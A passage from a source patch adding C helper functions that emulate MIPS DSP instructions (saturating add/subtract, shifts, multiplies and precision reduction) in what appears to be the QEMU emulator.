uint8_t b) +{ + uint16_t temp; + + temp = (uint16_t)a - (uint16_t)b; + + return (temp >> 1) & 0x00FF; +} + +static inline uint8_t mipsdsp_rrshift1_sub_u8(uint8_t a, uint8_t b) +{ + uint16_t temp; + + temp = (uint16_t)a - (uint16_t)b + 1; + + return (temp >> 1) & 0x00FF; +} +#endif + +/* 128 bits long. p[0] is LO, p[1] is HI. */ +static inline void mipsdsp_rndrashift_short_acc(int64_t *p, + int32_t ac, + int32_t shift, + CPUMIPSState *env) +{ + int64_t acc; + + acc = ((int64_t)env->active_tc.HI[ac] << 32) | + ((int64_t)env->active_tc.LO[ac] & 0xFFFFFFFF); + p[0] = (shift == 0) ? (acc << 1) : (acc >> (shift - 1)); + p[1] = (acc >> 63) & 0x01; +} + +#ifdef TARGET_MIPS64 +/* 128 bits long. p[0] is LO, p[1] is HI */ +static inline void mipsdsp_rashift_acc(uint64_t *p, + uint32_t ac, + uint32_t shift, + CPUMIPSState *env) +{ + uint64_t tempB, tempA; + + tempB = env->active_tc.HI[ac]; + tempA = env->active_tc.LO[ac]; + shift = shift & 0x1F; + + if (shift == 0) { + p[1] = tempB; + p[0] = tempA; + } else { + p[0] = (tempB << (64 - shift)) | (tempA >> shift); + p[1] = (int64_t)tempB >> shift; + } +} + +/* 128 bits long. 
p[0] is LO, p[1] is HI , p[2] is sign of HI.*/ +static inline void mipsdsp_rndrashift_acc(uint64_t *p, + uint32_t ac, + uint32_t shift, + CPUMIPSState *env) +{ + int64_t tempB, tempA; + + tempB = env->active_tc.HI[ac]; + tempA = env->active_tc.LO[ac]; + shift = shift & 0x3F; + + if (shift == 0) { + p[2] = tempB >> 63; + p[1] = (tempB << 1) | (tempA >> 63); + p[0] = tempA << 1; + } else { + p[0] = (tempB << (65 - shift)) | (tempA >> (shift - 1)); + p[1] = (int64_t)tempB >> (shift - 1); + if (tempB >= 0) { + p[2] = 0x0; + } else { + p[2] = ~0ull; + } + } +} +#endif + +static inline int32_t mipsdsp_mul_q15_q15(int32_t ac, uint16_t a, uint16_t b, + CPUMIPSState *env) +{ + int32_t temp; + + if ((a == 0x8000) && (b == 0x8000)) { + temp = 0x7FFFFFFF; + set_DSPControl_overflow_flag(1, 16 + ac, env); + } else { + temp = ((int16_t)a * (int16_t)b) << 1; + } + + return temp; +} + +static inline int64_t mipsdsp_mul_q31_q31(int32_t ac, uint32_t a, uint32_t b, + CPUMIPSState *env) +{ + uint64_t temp; + + if ((a == 0x80000000) && (b == 0x80000000)) { + temp = (0x01ull << 63) - 1; + set_DSPControl_overflow_flag(1, 16 + ac, env); + } else { + temp = ((int64_t)(int32_t)a * (int32_t)b) << 1; + } + + return temp; +} + +static inline uint16_t mipsdsp_mul_u8_u8(uint8_t a, uint8_t b) +{ + return (uint16_t)a * (uint16_t)b; +} + +static inline uint16_t mipsdsp_mul_u8_u16(uint8_t a, uint16_t b, + CPUMIPSState *env) +{ + uint32_t tempI; + + tempI = (uint32_t)a * (uint32_t)b; + if (tempI > 0x0000FFFF) { + tempI = 0x0000FFFF; + set_DSPControl_overflow_flag(1, 21, env); + } + + return tempI & 0x0000FFFF; +} + +#ifdef TARGET_MIPS64 +static inline uint64_t mipsdsp_mul_u32_u32(uint32_t a, uint32_t b) +{ + return (uint64_t)a * (uint64_t)b; +} +#endif + +static inline int16_t mipsdsp_rndq15_mul_q15_q15(uint16_t a, uint16_t b, + CPUMIPSState *env) +{ + uint32_t temp; + + if ((a == 0x8000) && (b == 0x8000)) { + temp = 0x7FFF0000; + set_DSPControl_overflow_flag(1, 21, env); + } else { + temp = 
((int16_t)a * (int16_t)b) << 1; + temp = temp + 0x00008000; + } + + return (temp & 0xFFFF0000) >> 16; +} + +static inline int32_t mipsdsp_sat16_mul_q15_q15(uint16_t a, uint16_t b, + CPUMIPSState *env) +{ + int32_t temp; + + if ((a == 0x8000) && (b == 0x8000)) { + temp = 0x7FFF0000; + set_DSPControl_overflow_flag(1, 21, env); + } else { + temp = (int16_t)a * (int16_t)b; + temp = temp << 1; + } + + return (temp >> 16) & 0x0000FFFF; +} + +static inline uint16_t mipsdsp_trunc16_sat16_round(int32_t a, + CPUMIPSState *env) +{ + uint16_t temp; + + + /* + * The value 0x00008000 will be added to the input Q31 value, and the code + * needs to check if the addition causes an overflow. Since a positive value + * is added, overflow can happen in one direction only. + */ + if (a > 0x7FFF7FFF) { + temp = 0x7FFF; + set_DSPControl_overflow_flag(1, 22, env); + } else { + temp = ((a + 0x8000) >> 16) & 0xFFFF; + } + + return temp; +} + +static inline uint8_t mipsdsp_sat8_reduce_precision(uint16_t a, + CPUMIPSState *env) +{ + uint16_t mag; + uint32_t sign; + + sign = (a >> 15) & 0x01; + mag = a & 0x7FFF; + + if (sign == 0) { + if (mag > 0x7F80) { + set_DSPControl_overflow_flag(1, 22, env); + return 0xFF; + } else { + return (mag >> 7) & 0xFFFF; + } + } else { + set_DSPControl_overflow_flag(1, 22, env); + return 0x00; + } +} + +static inline uint8_t mipsdsp_lshift8(uint8_t a, uint8_t s, CPUMIPSState *env) +{ + uint8_t discard; + + if (s != 0) { + discard = a >> (8 - s); + + if (discard != 0x00) { + set_DSPControl_overflow_flag(1, 22, env); + } + } + return a << s; +} + +static inline uint16_t mipsdsp_lshift16(uint16_t a, uint8_t s, + CPUMIPSState *env) +{ + uint16_t discard; + + if (s != 0) { + discard = (int16_t)a >> (15 - s); + + if ((discard != 0x0000) && (discard != 0xFFFF)) { + set_DSPControl_overflow_flag(1, 22, env); + } + } + return a << s; +} + +#ifdef TARGET_MIPS64 +static inline uint32_t mipsdsp_lshift32(uint32_t a, uint8_t s, + CPUMIPSState *env) +{ + uint32_t discard; + + 
if (s == 0) { + return a; + } else { + discard = (int32_t)a >> (31 - (s - 1)); + + if ((discard != 0x00000000) && (discard != 0xFFFFFFFF)) { + set_DSPControl_overflow_flag(1, 22, env); + } + return a << s; + } +} +#endif + +static inline uint16_t mipsdsp_sat16_lshift(uint16_t a, uint8_t s, + CPUMIPSState *env) +{ + uint8_t sign; + uint16_t discard; + + if (s == 0) { + return a; + } else { + sign = (a >> 15) & 0x01; + if (sign != 0) { + discard = (((0x01 << (16 - s)) - 1) << s) | + ((a >> (14 - (s - 1))) & ((0x01 << s) - 1)); + } else { + discard = a >> (14 - (s - 1)); + } + + if ((discard != 0x0000) && (discard != 0xFFFF)) { + set_DSPControl_overflow_flag(1, 22, env); + return (sign == 0) ? 0x7FFF : 0x8000; + } else { + return a << s; + } + } +} + +static inline uint32_t mipsdsp_sat32_lshift(uint32_t a, uint8_t s, + CPUMIPSState *env) +{ + uint8_t sign; + uint32_t discard; + + if (s == 0) { + return a; + } else { + sign = (a >> 31) & 0x01; + if (sign != 0) { + discard = (((0x01 << (32 - s)) - 1) << s) | + ((a >> (30 - (s - 1))) & ((0x01 << s) - 1)); + } else { + discard = a >> (30 - (s - 1)); + } + + if ((discard != 0x00000000) && (discard != 0xFFFFFFFF)) { + set_DSPControl_overflow_flag(1, 22, env); + return (sign == 0) ? 
0x7FFFFFFF : 0x80000000; + } else { + return a << s; + } + } +} + +static inline uint8_t mipsdsp_rnd8_rashift(uint8_t a, uint8_t s) +{ + uint32_t temp; + + if (s == 0) { + temp = (uint32_t)a << 1; + } else { + temp = (int32_t)(int8_t)a >> (s - 1); + } + + return (temp + 1) >> 1; +} + +static inline uint16_t mipsdsp_rnd16_rashift(uint16_t a, uint8_t s) +{ + uint32_t temp; + + if (s == 0) { + temp = (uint32_t)a << 1; + } else { + temp = (int32_t)(int16_t)a >> (s - 1); + } + + return (temp + 1) >> 1; +} + +static inline uint32_t mipsdsp_rnd32_rashift(uint32_t a, uint8_t s) +{ + int64_t temp; + + if (s == 0) { + temp = (uint64_t)a << 1; + } else { + temp = (int64_t)(int32_t)a >> (s - 1); + } + temp += 1; + + return (temp >> 1) & 0xFFFFFFFFull; +} + +static inline uint16_t mipsdsp_sub_i16(int16_t a, int16_t b, CPUMIPSState *env) +{ + int16_t temp; + + temp = a - b; + if (MIPSDSP_OVERFLOW_SUB(a, b, temp, 0x8000)) { + set_DSPControl_overflow_flag(1, 20, env); + } + + return temp; +} + +static inline uint16_t mipsdsp_sat16_sub(int16_t a, int16_t b, + CPUMIPSState *env) +{ + int16_t temp; + + temp = a - b; + if (MIPSDSP_OVERFLOW_SUB(a, b, temp, 0x8000)) { + if (a >= 0) { + temp = 0x7FFF; + } else { + temp = 0x8000; + } + set_DSPControl_overflow_flag(1, 20, env); + } + + return temp; +} + +static inline uint32_t mipsdsp_sat32_sub(int32_t a, int32_t b, + CPUMIPSState *env) +{ + int32_t temp; + + temp = a - b; + if (MIPSDSP_OVERFLOW_SUB(a, b, temp, 0x80000000)) { + if (a >= 0) { + temp = 0x7FFFFFFF; + } else { + temp = 0x80000000; + } + set_DSPControl_overflow_flag(1, 20, env); + } + + return temp & 0xFFFFFFFFull; +} + +static inline uint16_t mipsdsp_rshift1_sub_q16(int16_t a, int16_t b) +{ + int32_t temp; + + temp = (int32_t)a - (int32_t)b; + + return (temp >> 1) & 0x0000FFFF; +} + +static inline uint16_t mipsdsp_rrshift1_sub_q16(int16_t a, int16_t b) +{ + int32_t temp; + + temp = (int32_t)a - (int32_t)b; + temp += 1; + + return (temp >> 1) & 0x0000FFFF; +} + +static inline 
uint32_t mipsdsp_rshift1_sub_q32(int32_t a, int32_t b) +{ + int64_t temp; + + temp = (int64_t)a - (int64_t)b; + + return (temp >> 1) & 0xFFFFFFFFull; +} + +static inline uint32_t mipsdsp_rrshift1_sub_q32(int32_t a, int32_t b) +{ + int64_t temp; + + temp = (int64_t)a - (int64_t)b; + temp += 1; + + return (temp >> 1) & 0xFFFFFFFFull; +} + +static inline uint16_t mipsdsp_sub_u16_u16(uint16_t a, uint16_t b, + CPUMIPSState *env) +{ + uint8_t temp16; + uint32_t temp; + + temp = (uint32_t)a - (uint32_t)b; + temp16 = (temp >> 16) & 0x01; + if (temp16 == 1) { + set_DSPControl_overflow_flag(1, 20, env); + } + return temp & 0x0000FFFF; +} + +static inline uint16_t mipsdsp_satu16_sub_u16_u16(uint16_t a, uint16_t b, + CPUMIPSState *env) +{ + uint8_t temp16; + uint32_t temp; + + temp = (uint32_t)a - (uint32_t)b; + temp16 = (temp >> 16) & 0x01; + + if (temp16 == 1) { + temp = 0x0000; + set_DSPControl_overflow_flag(1, 20, env); + } + + return temp & 0x0000FFFF; +} + +static inline uint8_t mipsdsp_sub_u8(uint8_t a, uint8_t b, CPUMIPSState *env) +{ + uint8_t temp8; + uint16_t temp; + + temp = (uint16_t)a - (uint16_t)b; + temp8 = (temp >> 8) & 0x01; + if (temp8 == 1) { + set_DSPControl_overflow_flag(1, 20, env); + } + + return temp & 0x00FF; +} + +static inline uint8_t mipsdsp_satu8_sub(uint8_t a, uint8_t b, CPUMIPSState *env) +{ + uint8_t temp8; + uint16_t temp; + + temp = (uint16_t)a - (uint16_t)b; + temp8 = (temp >> 8) & 0x01; + if (temp8 == 1) { + temp = 0x00; + set_DSPControl_overflow_flag(1, 20, env); + } + + return temp & 0x00FF; +} + +#ifdef TARGET_MIPS64 +static inline uint32_t mipsdsp_sub32(int32_t a, int32_t b, CPUMIPSState *env) +{ + int32_t temp; + + temp = a - b; + if (MIPSDSP_OVERFLOW_SUB(a, b, temp, 0x80000000)) { + set_DSPControl_overflow_flag(1, 20, env); + } + + return temp; +} + +static inline int32_t mipsdsp_add_i32(int32_t a, int32_t b, CPUMIPSState *env) +{ + int32_t temp; + + temp = a + b; + + if (MIPSDSP_OVERFLOW_ADD(a, b, temp, 0x80000000)) { + 
set_DSPControl_overflow_flag(1, 20, env); + } + + return temp; +} +#endif + +static inline int32_t mipsdsp_cmp_eq(int32_t a, int32_t b) +{ + return a == b; +} + +static inline int32_t mipsdsp_cmp_le(int32_t a, int32_t b) +{ + return a <= b; +} + +static inline int32_t mipsdsp_cmp_lt(int32_t a, int32_t b) +{ + return a < b; +} + +static inline int32_t mipsdsp_cmpu_eq(uint32_t a, uint32_t b) +{ + return a == b; +} + +static inline int32_t mipsdsp_cmpu_le(uint32_t a, uint32_t b) +{ + return a <= b; +} + +static inline int32_t mipsdsp_cmpu_lt(uint32_t a, uint32_t b) +{ + return a < b; +} +/*** MIPS DSP internal functions end ***/ + +#define MIPSDSP_LHI 0xFFFFFFFF00000000ull +#define MIPSDSP_LLO 0x00000000FFFFFFFFull +#define MIPSDSP_HI 0xFFFF0000 +#define MIPSDSP_LO 0x0000FFFF +#define MIPSDSP_Q3 0xFF000000 +#define MIPSDSP_Q2 0x00FF0000 +#define MIPSDSP_Q1 0x0000FF00 +#define MIPSDSP_Q0 0x000000FF + +#define MIPSDSP_SPLIT32_8(num, a, b, c, d) \ + do { \ + a = (num >> 24) & MIPSDSP_Q0; \ + b = (num >> 16) & MIPSDSP_Q0; \ + c = (num >> 8) & MIPSDSP_Q0; \ + d = num & MIPSDSP_Q0; \ + } while (0) + +#define MIPSDSP_SPLIT32_16(num, a, b) \ + do { \ + a = (num >> 16) & MIPSDSP_LO; \ + b = num & MIPSDSP_LO; \ + } while (0) + +#define MIPSDSP_RETURN32_8(a, b, c, d) ((target_long)(int32_t) \ + (((uint32_t)a << 24) | \ + (((uint32_t)b << 16) | \ + (((uint32_t)c << 8) | \ + ((uint32_t)d & 0xFF))))) +#define MIPSDSP_RETURN32_16(a, b) ((target_long)(int32_t) \ + (((uint32_t)a << 16) | \ + ((uint32_t)b & 0xFFFF))) + +#ifdef TARGET_MIPS64 +#define MIPSDSP_SPLIT64_16(num, a, b, c, d) \ + do { \ + a = (num >> 48) & MIPSDSP_LO; \ + b = (num >> 32) & MIPSDSP_LO; \ + c = (num >> 16) & MIPSDSP_LO; \ + d = num & MIPSDSP_LO; \ + } while (0) + +#define MIPSDSP_SPLIT64_32(num, a, b) \ + do { \ + a = (num >> 32) & MIPSDSP_LLO; \ + b = num & MIPSDSP_LLO; \ + } while (0) + +#define MIPSDSP_RETURN64_16(a, b, c, d) (((uint64_t)a << 48) | \ + ((uint64_t)b << 32) | \ + ((uint64_t)c << 16) | \ + 
(uint64_t)d) +#define MIPSDSP_RETURN64_32(a, b) (((uint64_t)a << 32) | (uint64_t)b) +#endif + +/** DSP Arithmetic Sub-class insns **/ +#define MIPSDSP32_UNOP_ENV(name, func, element) \ +target_ulong helper_##name(target_ulong rt, CPUMIPSState *env) \ +{ \ + DSP32Value dt; \ + unsigned int i; \ + \ + dt.sw[0] = rt; \ + \ + for (i = 0; i < ARRAY_SIZE(dt.element); i++) { \ + dt.element[i] = mipsdsp_##func(dt.element[i], env); \ + } \ + \ + return (target_long)dt.sw[0]; \ +} +MIPSDSP32_UNOP_ENV(absq_s_ph, sat_abs16, sh) +MIPSDSP32_UNOP_ENV(absq_s_qb, sat_abs8, sb) +MIPSDSP32_UNOP_ENV(absq_s_w, sat_abs32, sw) +#undef MIPSDSP32_UNOP_ENV + +#if defined(TARGET_MIPS64) +#define MIPSDSP64_UNOP_ENV(name, func, element) \ +target_ulong helper_##name(target_ulong rt, CPUMIPSState *env) \ +{ \ + DSP64Value dt; \ + unsigned int i; \ + \ + dt.sl[0] = rt; \ + \ + for (i = 0; i < ARRAY_SIZE(dt.element); i++) { \ + dt.element[i] = mipsdsp_##func(dt.element[i], env); \ + } \ + \ + return dt.sl[0]; \ +} +MIPSDSP64_UNOP_ENV(absq_s_ob, sat_abs8, sb) +MIPSDSP64_UNOP_ENV(absq_s_qh, sat_abs16, sh) +MIPSDSP64_UNOP_ENV(absq_s_pw, sat_abs32, sw) +#undef MIPSDSP64_UNOP_ENV +#endif + +#define MIPSDSP32_BINOP(name, func, element) \ +target_ulong helper_##name(target_ulong rs, target_ulong rt) \ +{ \ + DSP32Value ds, dt; \ + unsigned int i; \ + \ + ds.sw[0] = rs; \ + dt.sw[0] = rt; \ + \ + for (i = 0; i < ARRAY_SIZE(ds.element); i++) { \ + ds.element[i] = mipsdsp_##func(ds.element[i], dt.element[i]); \ + } \ + \ + return (target_long)ds.sw[0]; \ +} +MIPSDSP32_BINOP(addqh_ph, rshift1_add_q16, sh); +MIPSDSP32_BINOP(addqh_r_ph, rrshift1_add_q16, sh); +MIPSDSP32_BINOP(addqh_r_w, rrshift1_add_q32, sw); +MIPSDSP32_BINOP(addqh_w, rshift1_add_q32, sw); +MIPSDSP32_BINOP(adduh_qb, rshift1_add_u8, ub); +MIPSDSP32_BINOP(adduh_r_qb, rrshift1_add_u8, ub); +MIPSDSP32_BINOP(subqh_ph, rshift1_sub_q16, sh); +MIPSDSP32_BINOP(subqh_r_ph, rrshift1_sub_q16, sh); +MIPSDSP32_BINOP(subqh_r_w, rrshift1_sub_q32, sw); 
+MIPSDSP32_BINOP(subqh_w, rshift1_sub_q32, sw); +#undef MIPSDSP32_BINOP + +#define MIPSDSP32_BINOP_ENV(name, func, element) \ +target_ulong helper_##name(target_ulong rs, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + DSP32Value ds, dt; \ + unsigned int i; \ + \ + ds.sw[0] = rs; \ + dt.sw[0] = rt; \ + \ + for (i = 0 ; i < ARRAY_SIZE(ds.element); i++) { \ + ds.element[i] = mipsdsp_##func(ds.element[i], dt.element[i], env); \ + } \ + \ + return (target_long)ds.sw[0]; \ +} +MIPSDSP32_BINOP_ENV(addq_ph, add_i16, sh) +MIPSDSP32_BINOP_ENV(addq_s_ph, sat_add_i16, sh) +MIPSDSP32_BINOP_ENV(addq_s_w, sat_add_i32, sw); +MIPSDSP32_BINOP_ENV(addu_ph, add_u16, sh) +MIPSDSP32_BINOP_ENV(addu_qb, add_u8, ub); +MIPSDSP32_BINOP_ENV(addu_s_ph, sat_add_u16, sh) +MIPSDSP32_BINOP_ENV(addu_s_qb, sat_add_u8, ub); +MIPSDSP32_BINOP_ENV(subq_ph, sub_i16, sh); +MIPSDSP32_BINOP_ENV(subq_s_ph, sat16_sub, sh); +MIPSDSP32_BINOP_ENV(subq_s_w, sat32_sub, sw); +MIPSDSP32_BINOP_ENV(subu_ph, sub_u16_u16, sh); +MIPSDSP32_BINOP_ENV(subu_qb, sub_u8, ub); +MIPSDSP32_BINOP_ENV(subu_s_ph, satu16_sub_u16_u16, sh); +MIPSDSP32_BINOP_ENV(subu_s_qb, satu8_sub, ub); +#undef MIPSDSP32_BINOP_ENV + +#ifdef TARGET_MIPS64 +#define MIPSDSP64_BINOP(name, func, element) \ +target_ulong helper_##name(target_ulong rs, target_ulong rt) \ +{ \ + DSP64Value ds, dt; \ + unsigned int i; \ + \ + ds.sl[0] = rs; \ + dt.sl[0] = rt; \ + \ + for (i = 0 ; i < ARRAY_SIZE(ds.element); i++) { \ + ds.element[i] = mipsdsp_##func(ds.element[i], dt.element[i]); \ + } \ + \ + return ds.sl[0]; \ +} +MIPSDSP64_BINOP(adduh_ob, rshift1_add_u8, ub); +MIPSDSP64_BINOP(adduh_r_ob, rrshift1_add_u8, ub); +MIPSDSP64_BINOP(subuh_ob, rshift1_sub_u8, ub); +MIPSDSP64_BINOP(subuh_r_ob, rrshift1_sub_u8, ub); +#undef MIPSDSP64_BINOP + +#define MIPSDSP64_BINOP_ENV(name, func, element) \ +target_ulong helper_##name(target_ulong rs, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + DSP64Value ds, dt; \ + unsigned int i; \ + \ + ds.sl[0] = rs; \ + dt.sl[0] = rt; \ 
+ \ + for (i = 0 ; i < ARRAY_SIZE(ds.element); i++) { \ + ds.element[i] = mipsdsp_##func(ds.element[i], dt.element[i], env); \ + } \ + \ + return ds.sl[0]; \ +} +MIPSDSP64_BINOP_ENV(addq_pw, add_i32, sw); +MIPSDSP64_BINOP_ENV(addq_qh, add_i16, sh); +MIPSDSP64_BINOP_ENV(addq_s_pw, sat_add_i32, sw); +MIPSDSP64_BINOP_ENV(addq_s_qh, sat_add_i16, sh); +MIPSDSP64_BINOP_ENV(addu_ob, add_u8, uh); +MIPSDSP64_BINOP_ENV(addu_qh, add_u16, uh); +MIPSDSP64_BINOP_ENV(addu_s_ob, sat_add_u8, uh); +MIPSDSP64_BINOP_ENV(addu_s_qh, sat_add_u16, uh); +MIPSDSP64_BINOP_ENV(subq_pw, sub32, sw); +MIPSDSP64_BINOP_ENV(subq_qh, sub_i16, sh); +MIPSDSP64_BINOP_ENV(subq_s_pw, sat32_sub, sw); +MIPSDSP64_BINOP_ENV(subq_s_qh, sat16_sub, sh); +MIPSDSP64_BINOP_ENV(subu_ob, sub_u8, uh); +MIPSDSP64_BINOP_ENV(subu_qh, sub_u16_u16, uh); +MIPSDSP64_BINOP_ENV(subu_s_ob, satu8_sub, uh); +MIPSDSP64_BINOP_ENV(subu_s_qh, satu16_sub_u16_u16, uh); +#undef MIPSDSP64_BINOP_ENV + +#endif + +#define SUBUH_QB(name, var) \ +target_ulong helper_##name##_qb(target_ulong rs, target_ulong rt) \ +{ \ + uint8_t rs3, rs2, rs1, rs0; \ + uint8_t rt3, rt2, rt1, rt0; \ + uint8_t tempD, tempC, tempB, tempA; \ + \ + MIPSDSP_SPLIT32_8(rs, rs3, rs2, rs1, rs0); \ + MIPSDSP_SPLIT32_8(rt, rt3, rt2, rt1, rt0); \ + \ + tempD = ((uint16_t)rs3 - (uint16_t)rt3 + var) >> 1; \ + tempC = ((uint16_t)rs2 - (uint16_t)rt2 + var) >> 1; \ + tempB = ((uint16_t)rs1 - (uint16_t)rt1 + var) >> 1; \ + tempA = ((uint16_t)rs0 - (uint16_t)rt0 + var) >> 1; \ + \ + return ((uint32_t)tempD << 24) | ((uint32_t)tempC << 16) | \ + ((uint32_t)tempB << 8) | ((uint32_t)tempA); \ +} + +SUBUH_QB(subuh, 0); +SUBUH_QB(subuh_r, 1); + +#undef SUBUH_QB + +target_ulong helper_addsc(target_ulong rs, target_ulong rt, CPUMIPSState *env) +{ + uint64_t temp, tempRs, tempRt; + bool flag; + + tempRs = (uint64_t)rs & MIPSDSP_LLO; + tempRt = (uint64_t)rt & MIPSDSP_LLO; + + temp = tempRs + tempRt; + flag = (temp & 0x0100000000ull) >> 32; + set_DSPControl_carryflag(flag, env); + + 
return (target_long)(int32_t)(temp & MIPSDSP_LLO); +} + +target_ulong helper_addwc(target_ulong rs, target_ulong rt, CPUMIPSState *env) +{ + uint32_t rd; + int32_t temp32, temp31; + int64_t tempL; + + tempL = (int64_t)(int32_t)rs + (int64_t)(int32_t)rt + + get_DSPControl_carryflag(env); + temp31 = (tempL >> 31) & 0x01; + temp32 = (tempL >> 32) & 0x01; + + if (temp31 != temp32) { + set_DSPControl_overflow_flag(1, 20, env); + } + + rd = tempL & MIPSDSP_LLO; + + return (target_long)(int32_t)rd; +} + +target_ulong helper_modsub(target_ulong rs, target_ulong rt) +{ + int32_t decr; + uint16_t lastindex; + target_ulong rd; + + decr = rt & MIPSDSP_Q0; + lastindex = (rt >> 8) & MIPSDSP_LO; + + if ((rs & MIPSDSP_LLO) == 0x00000000) { + rd = (target_ulong)lastindex; + } else { + rd = rs - decr; + } + + return rd; +} + +target_ulong helper_raddu_w_qb(target_ulong rs) +{ + target_ulong ret = 0; + DSP32Value ds; + unsigned int i; + + ds.uw[0] = rs; + for (i = 0; i < 4; i++) { + ret += ds.ub[i]; + } + return ret; +} + +#if defined(TARGET_MIPS64) +target_ulong helper_raddu_l_ob(target_ulong rs) +{ + target_ulong ret = 0; + DSP64Value ds; + unsigned int i; + + ds.ul[0] = rs; + for (i = 0; i < 8; i++) { + ret += ds.ub[i]; + } + return ret; +} +#endif + +#define PRECR_QB_PH(name, a, b)\ +target_ulong helper_##name##_qb_ph(target_ulong rs, target_ulong rt) \ +{ \ + uint8_t tempD, tempC, tempB, tempA; \ + \ + tempD = (rs >> a) & MIPSDSP_Q0; \ + tempC = (rs >> b) & MIPSDSP_Q0; \ + tempB = (rt >> a) & MIPSDSP_Q0; \ + tempA = (rt >> b) & MIPSDSP_Q0; \ + \ + return MIPSDSP_RETURN32_8(tempD, tempC, tempB, tempA); \ +} + +PRECR_QB_PH(precr, 16, 0); +PRECR_QB_PH(precrq, 24, 8); + +#undef PRECR_QB_OH + +target_ulong helper_precr_sra_ph_w(uint32_t sa, target_ulong rs, + target_ulong rt) +{ + uint16_t tempB, tempA; + + tempB = ((int32_t)rt >> sa) & MIPSDSP_LO; + tempA = ((int32_t)rs >> sa) & MIPSDSP_LO; + + return MIPSDSP_RETURN32_16(tempB, tempA); +} + +target_ulong 
helper_precr_sra_r_ph_w(uint32_t sa, + target_ulong rs, target_ulong rt) +{ + uint64_t tempB, tempA; + + /* If sa = 0, then (sa - 1) = -1 will case shift error, so we need else. */ + if (sa == 0) { + tempB = (rt & MIPSDSP_LO) << 1; + tempA = (rs & MIPSDSP_LO) << 1; + } else { + tempB = ((int32_t)rt >> (sa - 1)) + 1; + tempA = ((int32_t)rs >> (sa - 1)) + 1; + } + rt = (((tempB >> 1) & MIPSDSP_LO) << 16) | ((tempA >> 1) & MIPSDSP_LO); + + return (target_long)(int32_t)rt; +} + +target_ulong helper_precrq_ph_w(target_ulong rs, target_ulong rt) +{ + uint16_t tempB, tempA; + + tempB = (rs & MIPSDSP_HI) >> 16; + tempA = (rt & MIPSDSP_HI) >> 16; + + return MIPSDSP_RETURN32_16(tempB, tempA); +} + +target_ulong helper_precrq_rs_ph_w(target_ulong rs, target_ulong rt, + CPUMIPSState *env) +{ + uint16_t tempB, tempA; + + tempB = mipsdsp_trunc16_sat16_round(rs, env); + tempA = mipsdsp_trunc16_sat16_round(rt, env); + + return MIPSDSP_RETURN32_16(tempB, tempA); +} + +#if defined(TARGET_MIPS64) +target_ulong helper_precr_ob_qh(target_ulong rs, target_ulong rt) +{ + uint8_t rs6, rs4, rs2, rs0; + uint8_t rt6, rt4, rt2, rt0; + uint64_t temp; + + rs6 = (rs >> 48) & MIPSDSP_Q0; + rs4 = (rs >> 32) & MIPSDSP_Q0; + rs2 = (rs >> 16) & MIPSDSP_Q0; + rs0 = rs & MIPSDSP_Q0; + rt6 = (rt >> 48) & MIPSDSP_Q0; + rt4 = (rt >> 32) & MIPSDSP_Q0; + rt2 = (rt >> 16) & MIPSDSP_Q0; + rt0 = rt & MIPSDSP_Q0; + + temp = ((uint64_t)rs6 << 56) | ((uint64_t)rs4 << 48) | + ((uint64_t)rs2 << 40) | ((uint64_t)rs0 << 32) | + ((uint64_t)rt6 << 24) | ((uint64_t)rt4 << 16) | + ((uint64_t)rt2 << 8) | (uint64_t)rt0; + + return temp; +} + +#define PRECR_QH_PW(name, var) \ +target_ulong helper_precr_##name##_qh_pw(target_ulong rs, target_ulong rt, \ + uint32_t sa) \ +{ \ + uint16_t rs3, rs2, rs1, rs0; \ + uint16_t rt3, rt2, rt1, rt0; \ + uint16_t tempD, tempC, tempB, tempA; \ + \ + MIPSDSP_SPLIT64_16(rs, rs3, rs2, rs1, rs0); \ + MIPSDSP_SPLIT64_16(rt, rt3, rt2, rt1, rt0); \ + \ + /* When sa = 0, we use rt2, rt0, rs2, 
rs0; \ + * when sa != 0, we use rt3, rt1, rs3, rs1. */ \ + if (sa == 0) { \ + tempD = rt2 << var; \ + tempC = rt0 << var; \ + tempB = rs2 << var; \ + tempA = rs0 << var; \ + } else { \ + tempD = (((int16_t)rt3 >> sa) + var) >> var; \ + tempC = (((int16_t)rt1 >> sa) + var) >> var; \ + tempB = (((int16_t)rs3 >> sa) + var) >> var; \ + tempA = (((int16_t)rs1 >> sa) + var) >> var; \ + } \ + \ + return MIPSDSP_RETURN64_16(tempD, tempC, tempB, tempA); \ +} + +PRECR_QH_PW(sra, 0); +PRECR_QH_PW(sra_r, 1); + +#undef PRECR_QH_PW + +target_ulong helper_precrq_ob_qh(target_ulong rs, target_ulong rt) +{ + uint8_t rs6, rs4, rs2, rs0; + uint8_t rt6, rt4, rt2, rt0; + uint64_t temp; + + rs6 = (rs >> 56) & MIPSDSP_Q0; + rs4 = (rs >> 40) & MIPSDSP_Q0; + rs2 = (rs >> 24) & MIPSDSP_Q0; + rs0 = (rs >> 8) & MIPSDSP_Q0; + rt6 = (rt >> 56) & MIPSDSP_Q0; + rt4 = (rt >> 40) & MIPSDSP_Q0; + rt2 = (rt >> 24) & MIPSDSP_Q0; + rt0 = (rt >> 8) & MIPSDSP_Q0; + + temp = ((uint64_t)rs6 << 56) | ((uint64_t)rs4 << 48) | + ((uint64_t)rs2 << 40) | ((uint64_t)rs0 << 32) | + ((uint64_t)rt6 << 24) | ((uint64_t)rt4 << 16) | + ((uint64_t)rt2 << 8) | (uint64_t)rt0; + + return temp; +} + +target_ulong helper_precrq_qh_pw(target_ulong rs, target_ulong rt) +{ + uint16_t tempD, tempC, tempB, tempA; + + tempD = (rs >> 48) & MIPSDSP_LO; + tempC = (rs >> 16) & MIPSDSP_LO; + tempB = (rt >> 48) & MIPSDSP_LO; + tempA = (rt >> 16) & MIPSDSP_LO; + + return MIPSDSP_RETURN64_16(tempD, tempC, tempB, tempA); +} + +target_ulong helper_precrq_rs_qh_pw(target_ulong rs, target_ulong rt, + CPUMIPSState *env) +{ + uint32_t rs2, rs0; + uint32_t rt2, rt0; + uint16_t tempD, tempC, tempB, tempA; + + rs2 = (rs >> 32) & MIPSDSP_LLO; + rs0 = rs & MIPSDSP_LLO; + rt2 = (rt >> 32) & MIPSDSP_LLO; + rt0 = rt & MIPSDSP_LLO; + + tempD = mipsdsp_trunc16_sat16_round(rs2, env); + tempC = mipsdsp_trunc16_sat16_round(rs0, env); + tempB = mipsdsp_trunc16_sat16_round(rt2, env); + tempA = mipsdsp_trunc16_sat16_round(rt0, env); + + return 
